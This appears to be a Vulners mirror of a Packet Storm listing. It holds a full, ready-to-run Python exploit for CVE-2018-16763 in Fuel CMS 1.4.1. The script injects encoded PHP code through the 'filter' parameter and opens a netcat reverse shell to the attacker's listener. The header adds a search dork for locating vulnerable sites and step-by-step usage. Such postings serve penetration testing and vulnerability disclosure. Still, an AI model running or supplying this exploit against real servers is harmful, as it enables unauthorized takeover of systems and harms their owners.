Lucene search
+L

📄 Fuel CMS 1.4.1 Remote Command Execution

🗓️ 06 Apr 2026 00:00:00Reported by Suraj GuptaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 130 Views

Fuel CMS 1.4.1 enables code execution via filter parameter, allowing execution and shell access.

Related
Code
#!/usr/bin/python3
    # Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (RCE) via filter parameter
    # Google Dork: intitle:"Welcome to Fuel CMS" inurl:/fuel/
    # Date: 2025-04-05
    # Exploit Author: Suraj Gupta (0xmrsecurity)
    # Author GitHub: https://github.com/0xmrsecurity
    # Vendor Homepage: https://www.getfuelcms.com/
    # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
    # Version: 1.4.1
    # Tested on: Kali Linux 2024.1, Ubuntu 20.04
    # CVE: CVE-2018-16763
    # References:
    #   https://nvd.nist.gov/vuln/detail/CVE-2018-16763
    #   https://github.com/0xmrsecurity/Public_Poc/tree/main/CVE-2018-16763
    #
    # Description:
    #   Fuel CMS version 1.4.1 is vulnerable to Remote Code Execution (RCE) via
    #   the 'filter' parameter in /fuel/pages/select/. The parameter is passed
    #   unsanitized to PHP's eval() function, allowing an unauthenticated attacker
    #   to inject arbitrary PHP code and achieve OS-level command execution.
    #   Exploitation delivers a reverse shell to an attacker-controlled listener.
    #
    # Vulnerable Endpoint:
    #   GET /fuel/pages/select/?filter=[payload]
    #
    # Payload Technique:
    #   '+pi(print($a='system'))+$a('OS_COMMAND')+'
    #   The filter value is URL-encoded and injected into an eval() context.
    #
    # Impact:
    #   Unauthenticated Remote Code Execution — complete server compromise.
    #   CVSS v3 Base Score: 9.8 (Critical)
    #
    # Usage:
    #   Step 1: Start a netcat listener on your attacker machine:
    #           nc -lvnp <PORT>
    #
    #   Step 2: Run the exploit:
    #           python3 CVE-2018-16763.py --ip <TARGET_IP> --rhost <YOUR_IP> --rport <YOUR_PORT>
    #
    #   Example:
    #           python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444
    #
    # Disclaimer:
    #   This exploit is for authorized penetration testing and educational purposes only.
    #   Use only on systems you own or have explicit written permission to test.
    #   The author is not responsible for any misuse or damage caused by this tool.
    
    import requests
    import urllib.parse
    import argparse
    import sys
    
    BANNER = """
      _____ _   _ ______ _        _____ __  __  _____   ____   _____ ______
     |  ___| | | || ____| |      / ____|  \/  |/ ____| |  _ \ / ____|  ____|
     | |_  | | | || |__  | |    | |    | \  / | (___   | |_) | |    | |__
     |  _| | | | ||  __| | |    | |    | |\/| |\___ \  |  _ <| |    |  __|
     | |   | |_| || |____| |____| |____| |  | |____) | | |_) | |____| |____
     |_|    \___/ |______|______|\_____|_|  |_|_____/  |____/ \_____|______|
    
     CVE-2018-16763 | Fuel CMS 1.4.1 - Unauthenticated RCE
     Author: Suraj Gupta | github.com/0xmrsecurity
    """
    
    def build_payload(rhost, rport):
        shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {rhost} {rport} >/tmp/f"
        encoded = urllib.parse.quote(shell)
        return encoded
    
    def exploit(target_ip, rhost, rport):
        print(BANNER)
        print(f"[*] Target      : http://{target_ip}")
        print(f"[*] Callback    : {rhost}:{rport}")
        print(f"[*] CVE         : CVE-2018-16763")
        print(f"[*] Affected    : Fuel CMS v1.4.1")
        print("-" * 55)
    
        payload = build_payload(rhost, rport)
    
        url = (
            f"http://{target_ip}/fuel/pages/select/"
            f"?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29"
            f"%2b%24%61%28%27{payload}%27%29%2b%27"
        )
    
        print(f"[+] Sending exploit payload to target...")
        print(f"[!] Start your listener now: nc -lvnp {rport}")
        print("-" * 55)
    
        try:
            r = requests.get(url, timeout=8)
            print(f"[+] Request sent — HTTP {r.status_code}")
            if r.status_code == 200:
                print(f"[+] Payload delivered successfully.")
                print(f"[+] Check your listener on {rhost}:{rport} for reverse shell.")
            else:
                print(f"[-] Unexpected response code: {r.status_code}")
                print(f"[*] Target may be patched or unreachable.")
        except requests.exceptions.ConnectionError:
            print("[-] Connection failed — target may be down or IP is incorrect.")
            sys.exit(1)
        except requests.exceptions.Timeout:
            print("[+] Request timed out — this may indicate the shell connected!")
            print(f"[+] Check your listener on {rhost}:{rport}")
        except Exception as e:
            print(f"[-] Unexpected error: {e}")
            sys.exit(1)
    
    def main():
        parser = argparse.ArgumentParser(
            prog='CVE-2018-16763',
            description='Fuel CMS 1.4.1 — Unauthenticated Remote Code Execution',
            epilog='Example: python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444'
        )
        parser.add_argument('--ip',    required=True, help='Target IP running Fuel CMS 1.4.1')
        parser.add_argument('--rhost', required=True, help='Your attacker/listener IP')
        parser.add_argument('--rport', required=True, help='Your attacker/listener port')
        args = parser.parse_args()
        exploit(args.ip, args.rhost, args.rport)
    
    if __name__ == '__main__':
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2026 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.82937
130